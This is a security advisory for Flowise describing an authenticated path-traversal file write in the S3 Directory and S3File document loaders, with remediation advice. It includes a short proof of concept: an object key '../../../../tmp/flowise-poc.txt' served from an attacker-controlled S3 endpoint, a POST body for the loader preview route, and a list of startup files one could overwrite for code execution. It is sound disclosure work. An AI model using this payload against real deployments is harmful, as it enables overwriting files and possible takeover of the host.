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Flowise: Authenticated arbitrary file write in the `S3 Directory` document loader via unsanitized S3 object keys

GHSA-88pr-878c-24wf

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Description

Summary

Flowise on current main allows an authenticated user with
documentStores:preview-process permission to trigger the S3 Directory
document loader with attacker-controlled S3 object keys. The loader joins
each returned S3 key with a temporary directory using path.join(tempDir, key)
and writes the object bytes to disk without validating traversal sequences
such as ../
. Cleanup later removes only the original temporary directory,
so files written outside that directory persist on the host filesystem.

This yields arbitrary file write with the privileges of the Flowise
server process.

A related variant exists in the S3File loader when
fileProcessingMethod = unstructured (same root cause; its cleanup behavior
turns it into a mixed arbitrary write/delete/DoS primitive).

Affected component

  • packages/components/nodes/documentloaders/S3Directory/S3Directory.ts
    • line 191: filePath = path.join(tempDir, key) (unsanitized)
    • line 213: recursive mkdirSync creates parent path
    • line 216: writeFileSync writes attacker-controlled bytes
    • line 289: cleanup only removes the original tempDir, so escaped
      files remain on disk
  • Related (variant):
    packages/components/nodes/documentloaders/S3File/S3File.ts
    (lines 756, 780, 782, 817 — arbitrary write + recursive dirname delete)

Reachability

  • Routes exposed:
    packages/server/src/routes/documentstore/index.ts:41,45
    (/api/v1/document-store/loader/preview,
    /api/v1/document-store/loader/process/:loaderId)
  • Both require documentStores:preview-process
  • packages/server/src/services/documentstore/index.ts:588 passes
    data.loaderConfig straight to the loader node with no path
    sanitization
  • S3Directory accepts a custom serverUrl, so the attacker does not
    need access to an existing trusted AWS bucket
    — they can point Flowise
    at a local MinIO or any S3-compatible endpoint they control

Impact

  • Authenticated arbitrary file write to any path writable by the Flowise
    process
  • Destructive overwrite of application data, secrets, or configuration
  • Deployment-dependent lift to RCE if the service account can modify
    executable, startup, or interpreter-loaded files
    (e.g. .bashrc, systemd units, cron files, require.resolve targets,
    package.json postinstall scripts). This is not guaranteed
    product-wide.

Preconditions

  • Flowise instance running (HTTP server mode)
  • Attacker has a workspace account with the
    documentStores:preview-process role
  • No additional infrastructure required — serverUrl can point to
    attacker-controlled S3-compatible endpoint

Proof of Concept

  1. Authenticate as a user with documentStores:preview-process
  2. Run an S3-compatible server the attacker controls (e.g. MinIO)
  3. Create an object with a traversal key such as:
    ../../../../tmp/flowise-poc.txt
  4. Trigger:
    POST /api/v1/document-store/loader/preview
    (or /api/v1/document-store/loader/process/:loaderId)
    body: {
    "loaderId": "s3Directory",
    "loaderConfig": {
    "serverUrl": "http://attacker-minio:9000",
    "bucketName": "attacker-bucket",
    "prefix": "",
    "credential": ""

    }
    }
  5. Observe that Flowise writes the object bytes to the escaped path
  6. Observe that cleanup removes only the original temp directory; the
    escaped file persists

Local reproduction confirmed: writing a key containing
../../escape-target/poc.txt from a nested temp root created the file
outside the temp directory, and the cleanup removed only tempDir.

Root Cause

The loader trusts S3 object keys as safe local relative paths. It should
canonicalize the destination with path.resolve(...), verify the resolved
path remains within the intended temp directory, and reject traversal or
absolute-path patterns before any directory creation or file write.

Suggested Remediation

The repository already has shared path validators that are not used here:

  • packages/components/src/validator.ts:35 defines traversal checks
  • packages/components/src/validator.ts:295 defines sanitizeFileName

Recommended fix:

  1. Replace path.join(tempDir, key) with a resolve-and-verify flow
  2. Reject any resolved path outside tempDir
  3. Prefer a sanitized basename if directory structure is not required
  4. Apply the same fix to the S3File loader (fileProcessingMethod = unstructured branch)

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